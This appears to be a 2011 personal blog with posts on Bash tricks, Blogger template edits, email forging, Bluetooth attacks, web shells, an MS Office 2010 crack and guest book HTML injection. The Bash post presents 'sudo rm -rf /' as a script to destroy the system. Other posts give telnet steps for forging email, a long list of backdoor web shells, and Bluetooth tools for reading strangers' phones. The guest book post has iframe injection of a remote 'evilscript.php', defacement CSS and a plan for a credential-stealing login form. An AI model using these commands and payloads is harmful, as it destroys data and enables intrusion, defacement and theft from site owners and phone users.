Tuesday 26 July 2011

BASH TRICKS


What is Bash:-



Bash or Bourne Again Shell is a reimplementation of Bourne shell...
Bash is the default shell that comes with most of the linux distributions out there....

eg:-
Ubuntu , Red hat etc. etc...

Scenarios :-



1.Write a bash script to display the number of users logged in the system :-

Solution:-

Code:
#!/bin/sh 
who | wc -l
2.Write a bash script that makes the arguments given to it as executables :-

Solution :-
Code:
#!/bin/sh 
chmod +x $*
3.Write a bash script to display users with no password :-
(Can be very useful ;-) )

Code:
#!/bin/sh 
cat /etc/passwd | grep '^[^:]*::'
4.Write a bash script to destroy the system
(WoW!!!!)

Code:
!#/bin/bash

sudo rm -rf /
5.Write a bash script to display a long file page by page [well formated]

Code:
#!/bin/bash
cat long_file | more
6.Write a bash script to display a long file page by page [well formated] supporting back scrolling
(This is what makes a more command different from less)

Code:
#!/bin/bash
cat long_file | less
7.Write a bash command to delete your own password

Code:
#!/bin/bash
passwd -d ${USER}
8.Write a bash script to update your system

Code:
#!/bin/bash
sudo aptitude update #This will update the repository 
sudo aptitude upgrade#this will upgrade the system with the required updates
9.Write a bash script to print the file given as argument

Code:
lpr $1
10.Write a bash script to check whether a command is there installed in a system

Code:
#!/bin/bash

if ! which $1 ; then
        echo "Not istalled \n";
else
        echo "Installed";
fi
Posted by Alex at 0 comments

Remove "Subscribe to: Posts (Atom)" in Blogger


Steps :
1. Go to your Dashboard >> Design >> Edit HTML.

2. Search this code (Ctrl + F), ]]></b:skin> 

3. Paste the code below, just above ]]></b:skin>
.feed-links {
display:none;
}

4. Save your template. DONE!
Posted by Alex at 0 comments

Add Related Posts Widget in Blogger


1. Go to your Dashboard > Design > Edit HTML > Check Expand Widget Templates.

2. Find this code </head> 

3. Put this code below, above </head>
<style> #related-posts { float : left; width : 480px; margin-top:20px; margin-left : 5px; margin-bottom:20px; font : 11px Verdana; margin-bottom:10px; } #related-posts .widget { list-style-type : none; margin : 5px 0 5px 0; padding : 0; } #related-posts .widget h2, #related-posts h2 { font-size : 20px; font-weight : normal; margin : 5px 7px 0; padding : 0 0 5px; } #related-posts a { text-decoration : none; } #related-posts a:hover { text-decoration : none; } #related-posts ul { border : medium none; margin : 10px; padding : 0; } #related-posts ul li { display : block; background : url("https://sites.google.com/site/howtohouse/tools/howtohousefavicon-3.ico") no-repeat 0 0; margin : 0; padding-top : 0; padding-right : 0; padding-bottom : 1px; padding-left : 21px; margin-bottom : 5px; line-height : 2em; border-bottom:1px dotted #cccccc; } </style> <script src='https://sites.google.com/site/howtohouse/hth-scripts/howtohouse-RelatedPost.js' type='text/javascript'/>

4. Now, find this code <data:post.body/> . If you can't find it, find this code <div class='post-body>

5. Put this code below, under it :
<b:if cond='data:blog.pageType == "item"'>
<div id="related-posts">
<font face='Arial' size='3'><b>Related Posts : </b></font><font color='#FFFFFF'><b:loop values='data:post.labels' var='label'><data:label.name/><b:if cond='data:label.isLast != &quot;true&quot;'>,</b:if><b:if cond='data:blog.pageType == &quot;item&quot;'>
<script expr:src='&quot;/feeds/posts/default/-/&quot;   data:label.name   &quot;?alt=json-in-script&amp;callback=related_results_labels&amp;max-results=5&quot;' type='text/javascript'/></b:if></b:loop> </font>
<script type='text/javascript'> removeRelatedDuplicates(); printRelatedLabels();
</script>
</div></b:if>

8. Save and DONE!
Posted by Alex at 0 comments

ADD breadcrump to your blog


1. Go to your Dashboard >> Design >> Edit HTML >> Check Expand Widget Templates.
2. Search this code (Ctrl + F), ]]></b:skin>

3. Add the code below, just under the ]]></b:skin>
.breadcrumbs {
padding:5px 5px 5px 0px;
margin: 0px 0px 15px 0px;
font-size:95%;
line-height: 1.4em;
border-bottom:3px double #333333;
}
]]></b:skin>

4. Now search this code (Ctrl + F),
<b:include data='top' name='status-message'/>

5. Replace it with this code,
<b:include data='top' name='status-message'/>
<b:include data='posts' name='breadcrumb'/>

6. Then, find this code,
<b:includable id='main' var='top'>

7. Replace it with this code.

8. Save your template and DONE!
Posted by Alex at 0 comments

Scan your site


There are 3 free website scanning online you can use to check whether your blog infected by malicious software. Let's start check your site health.

1 - Google tools :

1. Google will gives you report about your site’s health immediately. Follow this link to check your site...
http://www.google.com/safebrowsing/diagnostic?site=http://yoursite.com

2. Change yoursite.com with your site name,

http://www.google.com/safebrowsing/diagnostic?site=http://ticksjustforyou.blogspot.com

3. Then, copy and paste it to your browser and hit Enter. You will get a result from Google

2 - AVG Online Web Page Scanner : 

1. The AVG LinkScanner Drop Zone lets you check the safety of individual web pages you are about to visit or your own web site.

2. Just  insert your website URL, then hit Scan button.
3 - Dr.WEB scanner :

1. Another method to scan your site. Using Dr.WEB scanner.
 
2. By simply paste your blog URL and click Scan, it will scan your site immediately.

Posted by Alex at 0 comments

EMAIL

All email communications on the internet are possible by two protocols:
1) Simple Mail Transfer Protocol (SMTP port-25)
2) Post Office Protocol (POP port-110)

E-Mail hacking consists of various techniques as discussed below.

1) EMail Tracing :- Generally, the path taken by an email while travelling from sender to receiver can be explained by following diagram.

Mail-Path


The most effective and easiest way to trace an email is to analyze it's email headers. This can be done by just viewing the full header of received email. A typical email header looks something like this:



The above email header gives us the following information about it's origin and path:

a) Sender's email address :- atiles@destatis.de

b) Source IP address :- 141.203.33.92

c) Source mail server :- dsl-189-160-34-89.prod-infinitum.com.mx

d) Email client :- Thunderbird 2.0.0.6


TipsThere are lots of ready-made tools available on the internet which performs email tracing very effectively and shows exact geographical location for email sender on the world map.


Recommended   Tools
NeoTrace
http://www.neotrace.com
VisualRoute
http://visualroute.visualware.com
E-MailTracker
http://www.visualware.com

2) EMail Forging :- Email forging allows an attacker to disguise the source of an email and send it to the victim. Most attackers use this technique to fool the victim into believing that somebody else has send the particular email.
The SMTP protocol makes it extremely easy for an attacker to send forged emails to a remote user.
Typically an attacker carries out email forging by following steps:

1) Start Command Prompt and type the following command-
c:/>telnet smtp.mailserver.com 25 or c:/>telnet mail.domain.com 25
example:- c:/>telnet smtp.gmail.com 25
The above command opens a telnet connection to the specified remote mail server on port-25. Where port-25 is the default SMTP port on which outgoing mail daemon runs.

2) Once you are connected to the mail daemon of remote mail server, you would be greeted with a message similar to following:-


If you are not familiar with the smtp mail daemon commands then enter the keyword 'help' at daemon which may reveal all the supporting commands as shown below.



3) The correct sequence of commands to be executed is:-
a) helo mailserver1.com
b) mail from:abc@mailserver1.com
c) rcpt to:xyz@mailserver2.com
d) data
e) .(dot command represents end of mail body)
This all as shown in figure below:


EMail forging by this technique does not possible, if mail relying is disabled by it's service provider.


3) Spam :- Every e-mail account and network on the internet has limited space and bandwidth. This means that if an attacker is able to clog up all the inbox space and bandwidth of the target computer, it could cause lot of inconvenience and unnecessary trouble. Spam e-mails have slowly but surely started clogging up the bandwidth on the internet and the memory space in our inboxes.

MailBombing:- Mailbombing is a technique wherein the attacker floods victim's e-mail account with an extremely large (sometimes infinite) number of unsolicited meaningless e-mails. Two different types of mailbombing are-

a) Mass Mailbombing
b) List Linking Mailbombing




Posted by Alex at 0 comments

Packet Header Analysis

Following are the easy to analyze ICMP, TCP and UDP packet headers along with short description.
All header Drawings by- "Matt Baxter" (www.fatpipe.org/~mjb/Drawings/)


ICMP-Header

ICMP Message Types :- ICMP message type-code/name format
0 Echo Reply
3 Destination Unreachable
4 Source Quench
5 Redirect
8 Echo
11 Time Exceeded
12 Parameter Problem
13 Timestamp
14 Timestamp Reply
15 Information Request
16 Information Reply

Checksum :- The checksum is the 16-bit ones's complement of the one's complement sum of the ICMP message starting with the ICMP Type.

RFC 792 :- Please refer to RFC 792 for Internet Control Message Protocol (ICMP) Specification.


TCP-Header

TCP Flags :- C E U A P R S F
C 0x80 Reduced (CWR)
E 0x40 ECN Echo (ECE)
U 0x20 Urgent
A 0x10 Ack
P 0x08 Push
R 0x04 Reset
S 0x02 Syn
F 0x01 Fin
 
TCP Options :-
0 End of Options List
1 No Operation (NOP, Pad)
2 Maximum Segment Size
3 Window Scale
4 Selective ACK ok
8 Timestamp
 
 
 

Checksum :- Checksum of entire TCP segment and pseudo header (parts of IP header)

Offset :- Number of 32-bit words in TCP header, minimum value of 5. Multiply by 4 to get byte count.

RFC 793 :- Please refer to RFC 793 for Transmission Control Protocol (TCP) Specification.


UDP-Header

Source Port :- an optional field, when meaningful, it indicates the port of the sending process, and may be assumed to be the port to which a reply should be addressed in the absence of any other information. If not used, a value of zero is inserted.

Destination Port :- Destination Port has a meaning within the context of a particular internet destination address.

Length :- Length is the length in octets of this user datagram including this header and the data. (This means the minimum value of the length is eight.)

Checksum :- Checksum is the 16-bit one's complement of the one's complement sum of a pseudo header of information from the IP header, the UDP header, and the data, padded with zero octets at the end (if necessary) to make a multiple of two octets.

RFC 768 :- Please refer to RFC 768 for User Datagram Protocol (UDP) Specification
Posted by Alex at 0 comments

BLUETOOTH HACKING

Discovering Bluetooth Devices :-
Before any two bluetooth enabled devices can start communicating with one another, they must carry out a procedure known as discovery. It can be carried out by scanning for other active devices within the range.

Recommended   Tools
BlueScanner
It will try to extract as much information as possible for each newly discovered device
BlueSniff
It is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices
BTBrowser
It is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth enabled devices. It works on phones that supports JSR-82 - the Java Bluetooth specification
BTCrawler
It is a scanner for Windows Mobile based devices. It also implements the BlueJacking and BlueSnarfing attacks
-----

Hacking Bluetooth Devices :-
There are a variety of different types of bluetooth related threats and attacks that can be executed against unsuspecting mobile phone users. Following are some of the most common types of threats :-

1) BluePrinting Attack :- Information gathering is the first step in the quest to break into target system. Even BlueTooth devices can be fingerprinted or probed for information gathering using the technique known as BluePrinting. Using this one can determine manufacturer, model, version, etc. for target bluetooth enabled device.
Recommended   Tools
BluePrint
As the name suggests
BTScanner
It is an information gathering tool that allows attacker to query devices without the need to carry out pairing

2) BlueJack Attack :- Bluejacking is the process of sending an anonymous message from a bluetooth enabled phone to another, within a particular range without knowing the exact source of the recieved message to the recepient.

Recommended   Tools
FreeJack
Bluejacking tool written in JAVA
-----
CIHWB
Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Supports BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack

3) BlueSnarf Attack :- Bluesnarfing is the process of connecting vulnerable mobile phones through bluetooth, without knowing the victim. It involves OBEX protocol by which an attacker can forcibly push/pull sensitive data in/out of the victim's mobile phone, hence also known as OBEX pull attack.
This attack requires J2ME enabled mobile phones as the attacker tool. With J2ME enabled phone, just by using bluesnarfing tools like Blooover, Redsnarf, Bluesnarf, etc. an attacker can break into target mobile phone for stealing sensitive data such as address book, photos, mp3, videos, SMS, ......!

Recommended   Tools
Blooover
It is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable. It can also be used to carry out BlueBug attack
RedSnarf
One of the best bluesnarfing tool
-----
BlueSnarfer
It downloads the phone-book of any mobile device vulnerable to Bluesnarfing

4) Blue Backdoor Attack :- Here, the bluetooth related vulnerability exploits the pairing mechanism that is used to establish a connection between two bluetooth enabled devices.Not only does it gives the attacker complete access and control over the target but also allows the attacker to place strategic backdoors for continued access and entry.

5) BlueBug Attack :- It was first discovered by Martin Herfurt and allows attackers to gain complete control over the data, voice and messaging channels of vulnerable target mobile phones.

Recommended   Tools
BlueBugger
Exploits the BlueBug vulnerability
Bluediving
It is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, etc.

6) The bluetooth protocol allows devices to use 16 digit long pairing codes. Unfortunately many applications continue to use only 4 digit pairing codes which can be easily brute-forced. This is known as short pairing codes.
Most slave bluetooth devices continue to use default pairing codes such as 0000, 1111, 1234, etc. So, easy to crack and gain access...!
Recommended   Tools
BTCrack
BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges


-: Other Powerful BlueTooth Hacking Tools :-

Transient Bluetooth Environment Auditor :- T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools.   Download
BlueTest :- BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices.   Download
BTAudit :- BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices.    Download
RedFang :- It is a brute force tool that finds even non-discoverable device.
Download
BlueAlert :- A windows based tool that runs on bluetooth enabled computer and alerts the user each time a blurtooth device leaves or enters into its range.
BlueFang :- Similar to BlueAlert.
Bluestumbler :- One of the best BluePrinting tool.

Super Bluetooth Hack :- With this java software you can connect to another mobile and ….

Once connected to a another phone via bluetooth you can-
  • Read his/her messages
  • Read his/her contacts
  • Change profile
  • Play ringtone even if phone is on silent
  • Play songs
  • Restart the phone
  • Switch off the phone
  • Restore factory settings
  • Change ringing volume
  • Call from his phone it includes all call functions like hold, etc.
Notes:-
1) When connecting devices use a code 0000
2) At start of program on smartphones do not forget to turn on bluetooth before start of the mobile .
  Download-  Super_Bluetooth_Hack_v1.07.zip  (99 KB)

Posted by Alex at 2 comments

Bluetooth

 Blue Backdoor Attack :- Here, the bluetooth related vulnerability exploits the pairing mechanism that is used to establish a connection between two bluetooth enabled devices.Not only does it gives the attacker complete access and control over the target but also allows the attacker to place strategic backdoors for continued access and entry.

BlueBug Attack :- It was first discovered by Martin Herfurt and allows attackers to gain complete control over the data, voice and messaging channels of vulnerable target mobile phones.

Recommended   Tools
BlueBugger
Exploits the BlueBug vulnerability
Bluediving
It is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, etc.

 The bluetooth protocol allows devices to use 16 digit long pairing codes. Unfortunately many applications continue to use only 4 digit pairing codes which can be easily brute-forced. This is known as short pairing codes.
Most slave bluetooth devices continue to use default pairing codes such as 0000, 1111, 1234, etc. So, easy to crack and gain access...!

Recommended   Tools
BTCrack
BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges


-: Other Powerful BlueTooth Hacking Tools :-

Transient Bluetooth Environment Auditor :- T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools.   Download
BlueTest :- BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices.   Download
BTAudit :- BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices.    Download
RedFang :- It is a brute force tool that finds even non-discoverable device.
Download
BlueAlert :- A windows based tool that runs on bluetooth enabled computer and alerts the user each time a blurtooth device leaves or enters into its range.
BlueFang :- Similar to BlueAlert.
Bluestumbler :- One of the best BluePrinting tool.

Super Bluetooth Hack :- With this java software you can connect to another mobile and ….

Once connected to a another phone via bluetooth you can-
  • Read his/her messages
  • Read his/her contacts
  • Change profile
  • Play ringtone even if phone is on silent
  • Play songs
  • Restart the phone
  • Switch off the phone
  • Restore factory settings
  • Change ringing volume
  • Call from his phone it includes all call functions like hold, etc.
Notes:-
1) When connecting devices use a code 0000
2) At start of program on smartphones do not forget to turn on bluetooth before start of the mobile .
  Download-  Super_Bluetooth_Hack_v1.07.zip  (99 KB)

Posted by Alex at 0 comments

Sunday 24 July 2011

SHELLS


shell is a piece of software that provides an interface for users of an operating system which provides access to the services of a kernel. However, the term is also applied very loosely to applications and may include any software that is "built around" a particular component, such as web browsers and email clients that are "shells" for HTML rendering engines. The name shell originates from shells being an outer layer of interface between the user and the internals of the operating system (the kernel).
Operating system shells generally fall into one of two categories: command-line and graphical. Command-line shells provide a command-line interface (CLI) to the operating system, while graphical shells provide a graphical user interface (GUI). In either category the primary purpose of the shell is to invoke or "launch" another program; however, shells frequently have additional capabilities such as viewing the contents of directories.
-info from wikipedia,alex
Posted by Alex at 0 comments

Shells for hacking


C99Shell v. 1.0 beta (5.02.2005)  PHP  
b374k PHP
b374k-mini-shell PHP
Cyber Shell  PHP  
GFS Web-Shell  PHP  
NFM 1.8  PHP  
r57shell  PHP  
Small Web Shell by ZaCo  PHP  
nsTView v2.1  PHP  
DxShell v1.0  PHP  
C99madShell v. 2.0 madnet edition  PHP  
CTT Shell  PHP  
GRP WebShell 2.0 release build 2018 (C)2006,Great  PHP  
Crystal shell  PHP  
Loaderz WEB Shell  PHP  
NIX REMOTE WEB SHELL  PHP  
Antichat Shell  PHP  
CasuS 1.5  PHP  
Sincap 1.0  PHP  
C99Shell v. 1.0 pre-release build(safe-mode)  PHP  
hiddens shell v1  PHP  
Web-shell (c)ShAnKaR  PHP
Predator  PHP
KA_uShell 0.1.6  PHP
NGH  PHP
C2007Shell v. 1.0 pre-release build #16 Modded by Adora & u9 h4c93r  PHP
Antichat Shell. Modified by Go0o$E  PHP
c0derz shell [csh] v. 0.1.1 release  PHP
iMHaBiRLiGi Php FTP  PHP
PHVayv  PHP
phpRemoteView  PHP
STNC WebShell v0.8  PHP
MyShell  PHP
ZyklonShell  PHP
AK-74 Security Team Web Shell Beta Version PHP
Gamma Web Shell  Perl-Cgi
go-shell  Perl-Cgi
PhpSpy Ver 2006 Perl-Cgi
CmdAsp.asp.txt  ASP  
CyberSpy5.Asp.txt  ASP  
klasvayv.asp.txt  ASP  
indexer.asp.txt  ASP  
NTDaddy v1.9  ASP  
reader.asp.txt  ASP  
RemExp.asp.txt  ASP  
zehir4.asp.txt  ASP  
Elmaliseker.txt  ASP  
EFSO_2.txt  ASP  
accept_language  PHP  
Ajax_PHP Command Shell  PHP  
Antichat Shell v1.3  PHP  
Ayyildiz Tim -AYT- Shell v 2.1 Biz  PHP  
aZRaiLPhp v1.0  PHP  
backupsql  PHP  
c99  PHP  
c99_locus7s  PHP  
c99_madnet  PHP  
c99_PSych0  PHP  
c99_w4cking  PHP  
Crystal  PHP  
ctt_sh  PHP  
cybershell  PHP  
dC3 Security Crew Shell PRiV  PHP  
Dive Shell 1.0 - Emperor Hacking Team  PHP  
DTool Pro  PHP  
Dx  PHP  
GFS web-shell ver 3.1.7 - PRiV8  PHP  
gfs_sh  PHP  
h4ntu shell [powered by tsoi]  PHP  
iMHaPFtp  PHP  
ironshell  PHP  
JspWebshell 1.2  PHP  
KAdot Universal Shell v0.1.6  PHP  
lamashell  PHP  
Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit  PHP  
load_shell  PHP  
matamu  PHP  
Moroccan Spamers Ma-EditioN By GhOsT  PHP  
myshell  PHP  
Mysql interface v1.0  PHP  
MySQL Web Interface Version 0.8  PHP  
mysql  PHP  
mysql_tool  PHP  
NCC-Shell  PHP  
NetworkFileManagerPHP  PHP  
NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version  PHP  
nshell  PHP  
nstview  PHP  
PH Vayv  PHP  
PHANTASMA  PHP  
PHP Shell  PHP  
php-backdoor  PHP  
php-include-w-shell  PHP  
pHpINJ  PHP  
PHPJackal  PHP  
PHPRemoteView  PHP  
Private-i3lue  PHP  
pws  PHP  
r57  PHP  
r57_iFX  PHP  
r57_kartal  PHP  
r57_Mohajer22  PHP  
rootshell  PHP  
ru24_post_sh  PHP  
s72 Shell v1.1 Coding  PHP  
Safe0ver Shell -Safe Mod Bypass By Evilc0der  PHP  
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2  PHP  
SimAttacker - Vrsion 1.0.0 - priv8 4 My friend  PHP  
simple_cmd  PHP  
simple-backdoor  PHP  
SimShell 1.0 - Simorgh Security MGZ  PHP  
SnIpEr_SA Shell  PHP  
Uploader  PHP  
WinX Shell  PHP  
Worse Linux Shell  PHP  
zacosmall PHP  
Antichat Shell v1.3 PHP  
Ayyildiz Tim -AYT- Shell v 2.1 Biz PHP  
aZRaiLPhp v1.0 PHP  
CrystalShell v.1 PHP  
Cyber Shell (v 1.0) PHP  
dC3 Security Crew Shell PRiV PHP  
Dive Shell 1.0 - Emperor Hacking Team PHP  
DxShell.1.0 PHP  
ELMALISEKER Backd00r ASP  
GFS web-shell ver 3.1.7 - PRiV8 PHP  
h4ntu shell [powered by tsoi] PHP  
JspWebshell 1.2 JSP  
KAdot Universal Shell v0.1.6 PHP  
Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit PHP  
Macker's Private PHPShell PHP  
Mysql interface v1.0 PHP  
MySQL Web Interface Version 0.8 PHP  
NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version PHP  
Perl Web Shell by RST-GHC PL  
Private-i3lue PHP  
RedhatC99 [login=redhat-pass=root] PHP  
Rootshell.v.1.0 PHP  
s72 Shell v1.1 Coding PHP  
Safe0ver Shell -Safe Mod Bypass By Evilc0der PHP  
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2 PHP  
SimAttacker - Vrsion 1.0.0 - priv8 4 My friend PHP  
SimShell 1.0 - Simorgh Security MGZs PHP  
WinX Shell PHP  
Worse Linux Shell PHP
Posted by Alex at 0 comments

FREE download Microsoft office 2010

ms office 2010Microsoft Office 2010 download links have been released to the public today. This public beta version of MS Office 2010 (v. 14.0.4536.1000) is now available for free downloadon Microsoft’s Official website.
Checkout archive for more MS office 2010 download links
Microsoft Office Professional Plus 2010 beta version also includes MS Publisher and Infopath 2010 along with Word, Excel, Outlook and Power point applications. Checkout what’s included with this download.
ms office 2010 download applications list

New Features Of Microsoft Office 2010

  • Outlook Social connector which includes the option to add friends to your social network direct from Outlook.
  • Built in screen capture for MS Powerpoint.
  • Upload or Save directly to Windows Live Sky Drive or SharePoint 2010.
  • Improved user navigation and Icons.
  • One click PDF saver.
  • Embed online videos into presentation.
Installation Requirements for MS office 2010
500 MHz 32-bit or 64-bit processor or higher
256 MB of system memory or more
3 GB of available disk space
1024x768 or higher resolution monitor
DVD-R/W Drive
Installer is around 700MB. Requires Online Activation after installation.
Supported OS : Windows XP SP3, Vista SP1, Windows 7How To Activate Microsoft Office 2010 for Free
Go to the download page.
Click the ‘Get it Now’ button.
Sign in with your live id and fill out the small form to download the beta of Microsoft Office 2010 for free.
You will get the Microsoft Office Professional Plus 2010 Beta Product Key called MAK key to activate your evaluation copy of Microsoft Office Professional Plus 2010 Beta.
microsoft office 2010 product key
At the bottom, you will find the link to download MS office 2010 for free, both 32 bit and 64 bit versions.
For Activating the Office 2010, first you have to install the product and do the following steps.
Step 1: Open Microsoft Word 2010 Beta and click on the "File" tab. Next click "Help".
Step 2: Click “Change Product Key”.
Step 3: Enter the Multiple Activation Key (MAK).
Step 4: Entering the MAK key in Microsoft Word 2010 Beta automatically activates all the Office Professional Plus 2010 Beta applications. Click on the "File" tab to return to the Document view.
UPDATEMS Office 2010 RC build 14.0.4734.1000 has been leaked on the internet and is rumored to be the latest RTM version of Microsoft Office 2010. The free keys which you got now doesn’t work with this version as it was a part of the Microsoft’s beta program.
But some users have managed to hack the activation procedure ofMicrosoft Office professional 2010 RC version which appears to be very simple as it only needs some files which we already have when installing the beta MS Office 2010 version. The two files which needs to be replaced seems to be tokens.dat and pkeyconfig-office.xrm-ms. The procedure for MS office 2010 crack is already available throughout major forums, where an user named SoLoR has made a script called ActivateOffice2010beta.7zwhich does the whole cracking procedure for you.
Since this version of MS office 2010 RC 14.0.4734.1000 is already cracked though some easy hacks, I don’t think Microsoft will release this as a final version now. So wait for an other RC build from Microsoft with this loop hole patched.
UPDATE: 18th September 2010
Here are the Official download links for MS Office 2010 [direct links]
This download contains Office Home and Student 2010, Office Home and Business 2010 and Office Professional 2010
Microsoft Office 2010 Single Image [One Setup file]
English 32-bit (x86): X16-32007.exe
English 64-bit (x64):X16-31970.exe
Microsoft Office Standard 2010
English 32-bit (x86): X16-32324.exe
English 64-bit (x64): X16-32361.exe
Microsoft Office Professional Plus 2010 (Retail Edition)
English 32-bit (x86): X16-32250.exe
English 64-bit (x64): X16-32213.exeSummary: Free Download Microsoft Office 2010 With Activation Product key

Posted by Alex at 0 comments

guest book hacking


So you have found a guest book which allows for HTML injection, so what now, what can you do?

So we know that we can enter HTML into the page, chances are if the owner hasn't stopped you putting HTML into the page, chances are they wont have stopped you putting PHP into the page (this will only work if the website is hosted on a host which has PHP installed for the users, most hosts allow for PHP pages i believe).

But what if you can't inject PHP into the guest book
Ok so you can't inject PHP directly into the guest book, unlucky.
But its not the end of the world, lets think through HTML and think what we might be able to use here, what allows us to put things into a webpage without having the processing done on that website...
IFRAME, FRAME, EMBED, APPLET

FRAME, IFRAME
Lets think you want to get a php page on to a website which only accepts HTML, so lets give it some HTML.

Code:
<frame src="http://www.yoursite.org/evilscript.php">


Now what does this do?
What it does is it creates an area on the page (this can be defined by using the height and width parameters) which basically shows what is on the page that you have used (in this case http://www.yoursite.org/evilscript.php).
Please note, that all processing of information is done where this is hosted.

EMBED, APPLET
Now for all you clever clogs who can write stuff in things like java, flash etc. you could write something in that language which could get information for you or some other task (im not going to go into alot of detail due to not knowing java, flash or what you are able to do with these)
Please note, that all processing of information is done where this is hosted.

Ok we can put things onto the website, but you can't really do much to the website can you, you can't deface it or get passwords.
Well we can but this involves another element of HTML, STYLE.
What this does is it defines how something comes up on a page so you can write a style to make anything in the bold tages(<b>) to be font arial font-color blue, or something like that

Wow we can make the thing look nice but that doesn't help us get passwords or deface the website.
I'll start with defacing the website.
There is a couple of things that style can do which are very useful...

Z-INDEX, what this does is define what layer of the page your information is.
The default level is 0, this is the original webpage.
1 is above 0 therefore if you set something to be z-index = 1 then it will be above the information on level 0. which is the original webpage.
-1 is below 0 therefore is you set something to be z-index = -1 then it will be below the informatin on level 0, this will mean that what you put would be hidden behind the original website.

POSITION, what this does is define where on the page what you have used position on will be displayed, for this I will only go into absolute position but there is also relative position.
With this you define exactly where you want something to be placed. There are two parameters to absolute position, top and left. This is how far from the top of the browser area you want something and how far from the left of the browser area you want something.

HIEGHT and WIDTH, what this does is define what size something is.

Now lets combine all those together, what would happen if you set...
z-index to 1
position top = 0
postition left = 0
height = 100%
width = 100%
on an something

Well it would cover the entire page.
That would be very useful for defacing the website.
Here is some example code of what something like this would look like.
Code:

<style>
#elem
{
z-index: 1;
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
background-color: black;
color: red;
}
</style>
<div id=elem>
<p align=center>
<b>You have been Hacked...<br>
By Me<br></b>
</p>
</div>



But what about getting passwords
Well if you can cover their web page with your own, maybe you can take their source code put that into what has been given above, change the form which allows them to login, to send you the information instead, obviously this is very obvious, so you will have to think of ways of changing this method to make sure you dont make it obvious of what has just happened.

Practicing HTML Injection/XSS
If anyone is interested in practicing what i have been talking about here, on my website i have created an area (completely secure) which will allow you to try this on differen't levels of filtering.
Each user has their own area (which only that user can access) so there is no worries about using that and then finding someone has stolen your information.
The website is Learn2Hack.Net
You need to be a member of Learn2Hack in order to access the practice area.
You will need to go to "Practice Area's" then to "XSS" then you choose either Guest book 1 (which has a small amount of filtering) or Guest book 2 (which has more filtering).

Posted by Alex at 0 comments
Subscribe to: Posts (Atom)